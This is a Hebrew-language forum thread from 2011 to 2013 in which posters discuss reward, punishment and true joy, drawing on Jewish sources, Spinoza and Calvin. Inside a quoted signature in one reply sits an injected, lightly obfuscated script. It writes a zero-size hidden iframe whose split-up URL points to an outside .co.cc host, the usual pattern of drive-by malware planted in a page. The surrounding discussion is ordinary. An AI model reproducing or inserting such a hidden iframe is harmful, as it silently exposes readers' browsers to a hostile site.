|
|
| נשלח ב-9/9/2011 06:10 |
|
| |
מה הוא גמול על טוב, ומה הוא עונש על רע
עיקר הגמול הוא שמחה. הרי גם כסף לא גומל, אם לא מביא שמחה, וקורה הדבר.
אולם, לְיִשְׁרֵי-לֵב שִׂמְחָה. כלומר, בלא ישרת לבב אין שמחה אמיתית.
יתר על כן, עונש על רע, הוא שמחה לרע, לאיד, כי בשמחת זדון מאבד בן אדם את השמחה האמיתית.
ושמחה לאשליות אשר בן אדם משלה בהן את עצמו, שמחה הזאת היא בעצם עונשו.
ניסיתי לומר העיקר על שמחה, כל שאר רואה אני כיוצא מזה.
אשמח למצוא תמימות דעים והערות לנאמר.
|
|
| נשלח ב-9/9/2011 09:51 |
|
| |
ינוח
העלית נושא מרתק. אולם כמדומה שראוי לפרט יותר מתי ואיך חלים הכללים שאמרת.
א. בעולם הבא. בעולם האמת, שבו אין לפי הידוע לנו שינויים והחיים נצחיים, למי שזוכה לזה, מה שנשאר עשוי להיות השמחה.
אולם בעולם הזה כל שמחה היא זמנית.
ב. האם כוונתך ב"שמחה" לרגש או להבנה - שכלית, קוגניטיבית (צריך לבחור את המאפיין הנכון ואולי כולם שוים?)?
ג. חילקת בין שמחה שמקורה מוצדק לבין שמחה פסולה. אולם האם יש הבדל ברגש השמחה לכשעצמו בהתאם למקורותיו? האם מי שחש שמחה מחמת רוע לב, כגון הצוחק למי שמחליק על בננה ונופל, האם שמחתו חלשה יותר אם מודדים רק את עוצמת הרגש?
ד. האם שמחה אינה תופעה פיזיולוגית? האם אין זה נכון שניתן לזהותה ואף למדוד את עוצמתה? לכאורה במכשירים לסריקת מוח זה אפשרי, ואפשר לתת משמעות פיזיולוגית לשמחה. כמובן, זה מצריך אותנו להגיע לשאלה הקשה מאד מהו הרגש ומהי הנשמה ומה היחס בין התודעה לגוף.
ה. שפינוזה טען כידוע ששמחה היא מלווה טבעי של עצם ההיות. אמנם דבריו אינם בהכרח אמיתיים (וגם לגביהם יש להעלות אותן שאלות כשלך). אולם יש מקום לשאול מה בין דבריך לדבריו (סליחה שאיני מסדר יותר. הנושא נראה חשוב אבל צריך לנסח במילים את הנחות היסוד של שיטתך ושלו).
ו. שוב, במילים אחרות, מה שכתבתי לעיל: האם הגרוע בשמחה שלא במקומה הוא מחמת המניע ואולי המוסריות שבדבר? אבל הרגש הוא אותו רגש, ואז החסרון הוא שאדם מזיק למידותיו ולנפשו או שזה יהיה קצר זמן והשמחה תהיה לצער, חרטה, בזיון ועוד? או שהשמחה עצמה שונה אם זו שמחה חיובית או שלילית?
ז. לא הבנתי לשיטתך אם שמחה כאשר יש עונש לרשעים היא שמחה טובה או רעה. (אמנם דעתי שלי היא שגם ענוש לצדיק לא טוב וזה נוגד את מטרת הבריאה שיהיו עונשים. ה' רוצה שכולנו נהיה מאושרים ונזכה לטוב. וכמדומה שכן למשל גם שיטת הרמח"ל - שהטוב אמור להיות מירבי לכולם, במידה שזה אפשר). אבל יש גם שיטות אחרות, כגון השיטה המפורסמת בשם התיאולוג הנוצרי קלוין, שכאשר הרשעים ייענשו בגהנום הצדיקים יתענגו לחזות בעונשם וזה כבוד השם (ומה שגרוע אולי יותר: אין בחירה חופשית אלא גזירה קדומה על הצדיק להיות צדיק ועל הרשע רשע לשיטתו...).
|
|
|
|
| נשלח ב-10/9/2011 23:26 |
|
| |
יש להביא מקור למהלך של ינוח ממאמר הבעש"ט ששאל על סתירה אם אדם נידון בראש השנה או בכל יום וענה שראה שואב מים יום אחד הלך לשאוב בכזה עצבות על מר גורלו שצריך לעבד כ"כ קשה וכו'. ויום שני הלך בשמחה גדולה על שעדיין יש לו כח לעבוד כו' בלי שהשתנה שום דבר במציאות השתנה בהבנה שלו. וממילא אפשר שבר"ה נגזר שלא יהיה לו כסף ואח"כ עשה תשובה אז יהיה לו שמח בלי כסף כמו שאילו היה לו כסף. [כתבתי מזכרון לא דייקתי.]
|
|
|
|
| נשלח ב-16/9/2011 08:26 |
|
| |
| מיימוני כתב: |  | | נושא מרתק. _________________ שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
תודה.
כאן תשובותיי לפי הנקודות שלך,
א.
יש בהבנתי עולם אחד במציאות. ובעולם הזה זכר לצדיק – משמח. זהו הידוע על העולם הבא לצדיק, כנאמר:
"רשעים אפילו בחייהם קרואים מתים, צדיקים אפילו במיתתן קרואים חיים" (ברכות יח, ב)
אין שינוים אך ורק בא-ל.
לכול אחד העם יש חלק בנצח ישראל.
ב.
כל רגש בבן אדם קשור לשכל (איני מדבר על כאלה כמו הצטמצמות האישון באור).
ג.
שמחה שפלה, מובן מה זה? שפל השפלות לא קטן קורה. ורעש איתו עלול להחריש קוֹל דְּמָמָה דַקָּה.
הבדל הוא בין סילוף לבין אמיתות, בין חיים לבין מוות. אמיתות יתגבר בכול מקרה במוקדם או במאוחר.
ד. כל מה שקורה בבן אדם הוא פיזיולוגי.
את השקר מגלים איכשהו ע"י מכשירים. חשוב יותר כי יגלה האדם שקר בנפשו כדי להתגבר עליו ולעלות ולא לרדת. רגשות גבהים מביאים שמחה אמיתית אשר היא החזקה ביותר, לא ברעש אלא בעומק ועילוי.
ה.
לא הייתי רוצה להיכנס כאן לדיונים על טענות שלשפינוזה, נראה שלא דרש שפינוזה על עיקרון ישרת לב, וזה העיקר אשר הוא לא דרש כאשר דיבר על שמחה. כי אז שמחה אינה שמחה, אלא סתם "רגש טבעי", רואים אותו אצל חיות שהולכות על שתיים אשר מחייכים ושוחטים ילדים במיטתם.
ו.
כן, כמו שאמרתי לעיל, שמחה מתוך שקר בנפשו היא סילוף, משמעותה מוות לנפשו.
לישרי לב - שמחה, היא חזקה ומנצחת את הנ"ל, על כך היא ערובה לנצח ישראל, כי רק ישראל כעם לא ויתר על ראשונותה.
ז.
אברהם אבינו לא רצה מוות על סדום, למען הצדיקים.
יעוד הצדיקים גם כן לחנך ולתקן, ואם רשע גובר, אז יש בזה גם אחראיות הצדיקים. זאת אומרת, אין יותר מידי סיבה למסיבה אצל הצדיקים בגין "כשל חינוכי" אשר גם חלקם בו. יחד עם זה, לגאולה מן הרשע יש סיבה לשמוח.
שמחה היא בהתגברות, השתלמות. מ-"כול הזמן שמח" יתחיל דיכאון תפל, יש להניח, די מהר.
בגורל איני חושב שכדאי להאמין.
|
|
| נשלח ב-16/9/2011 09:12 |
|
| |
| יהיאור כתב: |  | | אפשר שבר"ה נגזר |
|
בגורל איני חושב שכדאי להאמין.
ומה הוא הגורל החיובי? שהאדם יכתוב סימפוניה ברגשות גבוהות, או אולי יכתוב ספר הלכה על איך לחטט באף לפי הלכה, או אולי יבגוד ועל כך יישאר בחיים?
|
|
| נשלח ב-16/6/2013 14:27 |
|
| |
אכן הגמול מסתכם ב
נתינה מלאה ממקום נקי, לפעמים אנחנו גם נותנים מבלי להרגיש, כמו ללמד מישהו דברים על החיים ולתת לאדם אחר תובנות. כפי שהיה לי כשהייתי בקורס גמול השתלמות בנושא הדת.
|
|
|
|
| נשלח ב-16/6/2013 15:28 |
|
| |
הגמול הוא קודם כל נתינת הרגשה של סיפוק על המעשים הטובים .
אתה מרגיש טוב עם מה שעשית ועם זה שהצלחת לעזור ולסייע לזולת .
יחד עם זאת מגיע לך שכר טוב במשהו שאתה מתקשה בו וחפץ בשינוי .
גומל חסדים טובים .
|
|
|
|
|
| נשלח ב-19/6/2013 15:37 |
|
| |
'לישרי לב שמחה' אני מבין כי יושר הלב הוא מצב השמחה, ולא שמחה הנוספת עליו. ישר לב הוא מי שהשתדל כיכולתולעשות את הראוי על פי איזה עיקרון, ובכך השיג שלמות מסוימת והיא נקראת שמחה, אם כי אפשר שמצבו החיצוני יהיה רע או אומלל. במושג 'גמול' אני מבין מה שראוי שיקרה את האדם על מעשיו, אבל לא מה שקורה לו. הערה למיימוני. על העולם הבא אי אפשר כלל לדעת איזה דבר, ואי האפשרות הזו היא עקרונית. העולם הבא אינו אלא שאיפה אנושית להימלט מן המוות, ושאיפה מוסרית למשפט אחרון. ועוד כי חיים נצחיים ללא שנוי הם המצב האומלל ביותר שאפשר לאחל לנפש.
עודד
|
|
|
|
| נשלח ב-19/6/2013 18:08 |
|
| |
מה הפשט כל תגמולוהי עלי ?
שאני צריך להודות להשם על כל הגמול שהוא נותן לי ?
עבור מה ?
מה שייך שהוא צריך לגמול לי ?
|
|
|
|
| נשלח ב-20/6/2013 10:57 |
|
| |
כתב WOLND: העולם הבא אינו אלא שאיפה אנושית להימלט מן המוות, ושאיפה מוסרית למשפט אחרון.
משפט נהדר ממש אולי במקום משפט אחרון יותר טוב לנסח: משפט צדק (אחרי כל האי צדק) ואפשר גם להוסיף: רגש אנושי לא להפרד לגמרי מהמתים האהובים
|
|
|
|
| נשלח ב-20/6/2013 11:49 |
|
| |
, כל תגמולוהי עלי- פרושו- מה שקורה לי הגמול שאני מקבל בעולם -רע וטוב, הם עלי בגלל מעשי.
אם אתה עובד ומתפרנס מקבל משכורת וחיי חיי רווחה יחסים. זה בגלל שאתה עובד. אם אתה מחנך את ילידיך בדרך הישר- הם יכבדו אותך וגם הסביבה אם אתה חולה ופונה לרופא ומתרפא זה בגלל שהלכת לרופא ולקחת תרופות אם אתה יושב בבית סהר בגלל גניבה. אז אתה יושב בגלל שגנבת. הכל לפי מעשיך. לטוב ולרע, אף אחד לא חייב לך כלום,
|
|
|
|
| נשלח ב-20/6/2013 19:18 |
|
| |
לכל אחד נגזר כמה ירויח ויקבל .
אלא שהרעותי את מעשי וקיפחתי את פרנסתי .
|
|
|
|
| נשלח ב-20/6/2013 19:41 |
|
| |
אדם שלא יוצא לעבודה- מירע את מעשיו ומקפח את פרנסתו, ה' שולח ברכה רק במעשי ידיו של האדם.
|
|
|
|
| נשלח ב-20/6/2013 23:45 |
|
| |
כפי שמובא בספרי חסידות שעל האדם לעבוד להפוך לכלי מוכן לקבל את השפע .
|
|
|
|
|
 |
|
|
|
|
| מנהל לחץ כאן לנעילת האשכול
|